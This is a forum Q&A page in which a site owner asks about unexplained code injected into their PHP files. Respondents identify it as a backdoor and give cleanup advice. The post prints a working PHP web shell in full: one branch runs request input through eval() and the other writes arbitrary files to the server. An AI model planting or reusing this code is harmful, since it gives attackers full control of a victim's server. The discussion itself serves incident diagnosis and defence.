Maison >développement back-end >tutoriel php >PHP文件莫名其妙的被加了代码,看不懂,求解释

PHP文件莫名其妙的被加了代码,看不懂,求解释

WBOY
WBOYoriginal
2016-06-06 20:50:301092parcourir

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

回复内容:

<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。

第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。

请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。

这是一句话木马。

这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!

网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限

Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn